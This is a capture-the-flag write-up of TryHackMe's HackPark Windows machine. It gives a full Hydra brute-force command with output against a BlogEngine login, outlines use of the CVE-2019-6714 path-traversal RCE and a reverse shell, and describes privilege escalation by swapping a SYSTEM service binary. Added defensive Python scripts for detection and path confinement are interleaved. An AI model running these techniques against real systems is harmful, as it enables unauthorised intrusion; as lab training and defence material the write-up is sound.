TryHackMe HackPark Machine Writeup

I subscribed to TryHackMe a long time back but only recently started working on the machines. I found the THM guys are doing a great job and I believe in a few months they will be in direct competition with HackTheBox. They are getting new users subscribed in large numbers as word-of-mouth has started to spread in the cyber security forums and users have started to publish their write-ups. The THM approach is much different from HTB; well, at least there are no restrictions.

So here is my first full public write-up of TryHackMe's new Windows machine called HackPark. Note that this machine is available in the subscriber-only labs; it is not available to free subscribers. You can always subscribe to the free labs, where you will find a good number of exploitable machines.

HackPark is a Windows machine. The goal is to brute force a website's login page using Hydra, identify and use a public exploit to get RCE, enumerate with WinPEAS, and then escalate privileges to gain access to the system administrator account.

NMAP SCANNING

The NMAP scan revealed a couple of open ports. I visited the website and the answer for the first flag was on the home page.

Find the login page and find the web server request method.

Getting the 1st flag is very basic; next we need to find a login page to attack and identify what type of request the form makes to the web server. I used GoBuster to find the login page and Burp Suite to find the web server request type.

Brute force the Login page to get the Admin password

The website is running on BlogEngine, and a quick Google search showed me the default user is “Admin”. So I used Hydra to do the rest and successfully obtained the password.

# root @ ns09 in ~/thm/hackpark [11:42:15] 
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.96.114 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=pkSueCvXAtRbGCRvc8gmQx32k%2F7OgbrjjMiFv7aMQSGeYpgaB%2FFOFiwLIcAXoZs%2FdS19k6vXj7GcRldN8Ez5D3He1PAiWSKHvUumRHPRccTMNbcmhH0NYiJzSBmHF6kUVTfjVflEYgeBSsMIKJ2P0n%2BV4kKLEMfHEoMXGrHxt7BKy8eEL6zMEICvBiR1iD8bP7qGe4%2FCT2J8Tw5Mj9JDpiO%2FCpAtF02aF25L%2Bhsop5q83ZwG4eQwkZYYxnylaBjW5TaZKFThE1uhPkauUHA8dSehRd7cTKK5KevlMK7WH2fPID0HMZAqPdSRAIx%2Fx1UODOrlzV%2FE37YO6ndHb7HaTi91fgoJycnIaDqnrNbFTDABlFmL&__EVENTVALIDATION=iLyHW76WtnmnF2vmdD0CcHD00zRe0gSqUWwKHdlt%2FLfESv60EKUDd8gk6W3%2BErpGxSjFfExyfxMS%2B%2BbPQ4C8eMxGW4Iq7aPcskxlrdb2oNhwpzphp9pggL%2BCn1ER4TpHQH%2BOqhPdzDbdaHaQeU5nzaIGEQKZLWQx8%2BqpwlmL1sooponz&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-26 11:42:18
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.96.114:80/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=pkSueCvXAtRbGCRvc8gmQx32k%2F7OgbrjjMiFv7aMQSGeYpgaB%2FFOFiwLIcAXoZs%2FdS19k6vXj7GcRldN8Ez5D3He1PAiWSKHvUumRHPRccTMNbcmhH0NYiJzSBmHF6kUVTfjVflEYgeBSsMIKJ2P0n%2BV4kKLEMfHEoMXGrHxt7BKy8eEL6zMEICvBiR1iD8bP7qGe4%2FCT2J8Tw5Mj9JDpiO%2FCpAtF02aF25L%2Bhsop5q83ZwG4eQwkZYYxnylaBjW5TaZKFThE1uhPkauUHA8dSehRd7cTKK5KevlMK7WH2fPID0HMZAqPdSRAIx%2Fx1UODOrlzV%2FE37YO6ndHb7HaTi91fgoJycnIaDqnrNbFTDABlFmL&__EVENTVALIDATION=iLyHW76WtnmnF2vmdD0CcHD00zRe0gSqUWwKHdlt%2FLfESv60EKUDd8gk6W3%2BErpGxSjFfExyfxMS%2B%2BbPQ4C8eMxGW4Iq7aPcskxlrdb2oNhwpzphp9pggL%2BCn1ER4TpHQH%2BOqhPdzDbdaHaQeU5nzaIGEQKZLWQx8%2BqpwlmL1sooponz&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed
[STATUS] 1158.00 tries/min, 1158 tries in 00:01h, 14343241 to do in 206:27h, 16 active
[80][http-post-form] host: 10.10.96.114   login: admin   password: *****
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-26 11:43:38
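From the defender's side, the Hydra run above leaves a very recognisable trail: over a thousand POSTs per minute to /Account/login.aspx from one client. Note that the Hydra command matches the string "Login Failed" in the response body, which means a failed login still comes back as HTTP 200, so you cannot separate failures from successes by status code alone; the POST rate per client is the useful signal. The script below is an added example written for this write-up, not part of the original post or of BlogEngine. It parses constructed IIS W3C log lines (default field order, synthetic IPs and timestamps) and flags any client that exceeds a threshold of login POSTs inside a sliding window.

```python
"""Detect a login brute force against BlogEngine's login page in IIS W3C logs.

Added example, not from the original write-up. Log lines are constructed
samples; the field list follows the default IIS W3C extended format.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PAGE = "/Account/login.aspx"


def build_sample_log() -> str:
    """Construct a small IIS W3C log: one normal visitor, one brute-forcing client."""
    header = (
        "#Software: Microsoft Internet Information Services 8.5\n"
        "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
        "cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken\n"
    )
    t0 = datetime(2020, 4, 26, 11, 42, 18)
    lines = [f"{t0:%Y-%m-%d %H:%M:%S} 10.10.96.114 GET / - 80 - 10.8.0.9 Mozilla/5.0 200 0 0 15"]
    # Legitimate user: two login attempts (a typo, then success), both HTTP 200.
    for offset in (5, 20):
        ts = t0 + timedelta(seconds=offset)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} 10.10.96.114 POST {LOGIN_PAGE} ReturnURL=/admin "
                     f"80 - 10.8.0.9 Mozilla/5.0 200 0 0 40")
    # Brute-forcing client: 40 POSTs in 40 seconds, every response is also HTTP 200.
    for offset in range(40):
        ts = t0 + timedelta(seconds=offset)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} 10.10.96.114 POST {LOGIN_PAGE} ReturnURL=/admin "
                     f"80 - 10.8.0.5 Mozilla/5.0+(Hydra) 200 0 0 31")
    return header + "\n".join(lines) + "\n"


def parse_w3c(text: str):
    """Parse IIS W3C extended log text into dicts keyed by the names in #Fields."""
    fields = None
    records = []
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields directive")
        values = raw.split()
        if len(values) != len(fields):
            continue  # skip a malformed line rather than abort the whole file
        rec = dict(zip(fields, values))
        rec["timestamp"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def find_login_bruteforce(records, uri_stem=LOGIN_PAGE, threshold=20, window=timedelta(seconds=60)):
    """Return {client_ip: peak POSTs to uri_stem within `window`} for IPs at or over `threshold`.

    Status codes are deliberately ignored: BlogEngine answers a failed login with 200.
    """
    hits = [r for r in records
            if r["cs-method"] == "POST" and r["cs-uri-stem"].lower() == uri_stem.lower()]
    hits.sort(key=lambda r: r["timestamp"])
    recent = defaultdict(deque)   # per-IP timestamps still inside the window
    peak = defaultdict(int)
    for r in hits:
        q = recent[r["c-ip"]]
        q.append(r["timestamp"])
        while q and r["timestamp"] - q[0] > window:
            q.popleft()
        peak[r["c-ip"]] = max(peak[r["c-ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}


if __name__ == "__main__":
    for ip, n in find_login_bruteforce(parse_w3c(build_sample_log())).items():
        print(f"{ip}: {n} login POSTs inside a 60 s window")
```

On a real server you would feed it the day's log from the IIS LogFiles folder; the threshold of 20 POSTs per minute is an assumption chosen for the demo, and a site with many users would tune it per client rather than globally.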

Compromise The Machine

In this step, I had to identify and execute a public exploit from exploit-db.com to get initial access on this Windows machine. As I was already logged in as Admin, I went ahead to find the version of BlogEngine. It wasn't difficult; I found it in the About section.

BlogEngine version 3.3.6.0 is known for a Directory Traversal and Remote Code Execution (RCE) vulnerability (CVE-2019-6714).

Gaining Initial Shell

I copied the exploit code into my THM working directory for HackPark, created a new file called PostView.ascx and pasted the content in, then changed the client IP and port to match my setup.

I opened another terminal window and started my listener.

Next, I opened the blog post (Welcome to HackPack), uploaded the modified PostView.ascx using the file manager within the post edit options, and then triggered it from the URL: ?theme=../../App_Data/files

I received the connection back in my listener as IIS AppPool\Blog.
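The root cause of CVE-2019-6714 is that the `theme` parameter is used to build a filesystem path without being confined to the themes directory, which is why `../../App_Data/files` lands on the uploaded control. Below is an added example of the defensive counterpart, written for this write-up in Python rather than taken from BlogEngine.NET (which is C#): a theme name is only accepted if it is a single plain path segment and its resolved location is still inside the themes root. Both checks are kept on purpose; the symlink probe in the demo passes the name check and is caught only by the containment check. The directory layout is constructed in a temp folder.

```python
"""Confine a user-supplied theme name to the themes directory.

Added example, not code from BlogEngine.NET or from the write-up. The layout
built by demo() is constructed for illustration.
"""
import os
import re
import tempfile
from pathlib import Path

# One plain path segment: no separators, no dots, bounded length.
THEME_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}$")


def check_theme(themes_root, theme):
    """Classify a theme name as 'ok', 'bad-name', 'outside-root' or 'not-found'."""
    if not THEME_NAME.match(theme):
        return "bad-name"
    root = Path(themes_root).resolve()
    candidate = (root / theme).resolve()        # follows '..' and symlinks
    try:
        inside = os.path.commonpath([root, candidate]) == str(root)
    except ValueError:                          # e.g. different drives on Windows
        inside = False
    if not inside:
        return "outside-root"
    if not candidate.is_dir():
        return "not-found"
    return "ok"


def theme_dir(themes_root, theme):
    """Return the resolved theme directory, or None when check_theme() rejects the name."""
    if check_theme(themes_root, theme) != "ok":
        return None
    return (Path(themes_root) / theme).resolve()


def demo():
    """Constructed layout: a themes folder, a sibling App_Data folder and a symlink that escapes."""
    base = Path(tempfile.mkdtemp())
    themes = base / "themes"
    (themes / "Standard").mkdir(parents=True)
    (base / "App_Data" / "files").mkdir(parents=True)
    # A well-formed name whose target lies outside the themes root.
    os.symlink(base / "App_Data", themes / "Escape", target_is_directory=True)
    probes = [
        "Standard",                 # legitimate theme
        "../../App_Data/files",     # the traversal used against BlogEngine
        "Standard/../../App_Data",  # traversal hidden behind a valid prefix
        "Escape",                   # passes the name check, fails containment
        "Missing",                  # well-formed, but no such theme
    ]
    return {name: check_theme(themes, name) for name in probes}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name!r:28} -> {verdict}")
```

The same two-step pattern (allowlist the segment, then verify the canonical path) applies to any parameter that selects a file or directory, including the file manager upload path used in the next step.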

Privilege Escalation

I made a shell using MSFVenom.

I hosted it with a Python SimpleHTTPServer.

I imported the shell I had just created using the PowerShell Invoke-WebRequest command.

I ran the reverse shell handler commands in Metasploit.

As soon as I ran .\shell.exe from the terminal, I had a meterpreter shell open.

I imported winPEAS onto the machine the same way as I imported shell.exe and ran it from a proper shell to find the running processes. The exploitable service is Message.exe.

I next moved shell.exe into the SystemScheduler directory, renamed the service binary Message.exe to Message.bak and then renamed shell.exe to Message.exe.

c:\Program Files (x86)\SystemScheduler> mv Message.exe Message.back
 mv Message.exe Message.back
'mv' is not recognized as an internal or external command,
operable program or batch file.

c:\Program Files (x86)\SystemScheduler>rename Message.exe Message.bak
rename Message.exe Message.bak

c:\Program Files (x86)\SystemScheduler>rename shell.exe Message.exe
rename shell.exe Message.exe

I then exited the current Meterpreter session, went back to the MSF multi/handler and ran the shell command again. It took around 30 seconds to get me a meterpreter shell as SYSTEM.
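What made this escalation possible is a scheduler running as SYSTEM out of a directory that a low-privileged account (the IIS application pool here) can write to; the lasting fix is to restrict write access on that directory to administrators. Until that is done, the swap above is easy to spot with a file-integrity baseline: the original binary reappears under a new name and the executable the scheduler launches no longer matches its recorded hash. The script below is an added example for this write-up (not a tool used in the original post); it replays the rename-and-drop in a constructed temp directory and reports what changed against the baseline.

```python
"""Spot a swapped service binary with a SHA-256 baseline of a directory.

Added example, not part of the original write-up. demo() replays the
Message.exe swap in a constructed temp directory with fake file contents.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def snapshot(directory):
    """Map each file under `directory` (path relative to it) to its SHA-256 digest."""
    root = Path(directory)
    result = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = str(path.relative_to(root)).replace(os.sep, "/")
            result[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return result


def diff_snapshots(before, after):
    """Return the files added, removed and changed between two snapshots."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "changed": sorted(k for k in set(before) & set(after) if before[k] != after[k]),
    }


def demo():
    """Baseline a constructed scheduler folder, replay the swap, and diff."""
    d = Path(tempfile.mkdtemp())
    (d / "Message.exe").write_bytes(b"MZ original scheduler helper (constructed)")
    (d / "WScheduler.exe").write_bytes(b"MZ another untouched binary (constructed)")
    baseline = snapshot(d)
    # The sequence from the terminal above: keep the original under a new
    # name, then put a different executable in its place.
    (d / "Message.exe").rename(d / "Message.bak")
    (d / "Message.exe").write_bytes(b"MZ replacement binary (constructed)")
    return diff_snapshots(baseline, snapshot(d))


if __name__ == "__main__":
    report = demo()
    for kind, files in report.items():
        print(f"{kind:8}: {', '.join(files) or '-'}")
```

In practice the baseline would be stored off the host and the comparison scheduled; a ".bak" copy appearing next to an executable that runs as SYSTEM is worth an alert on its own, independent of the hash mismatch.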

Original Install Time:

Root.txt

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
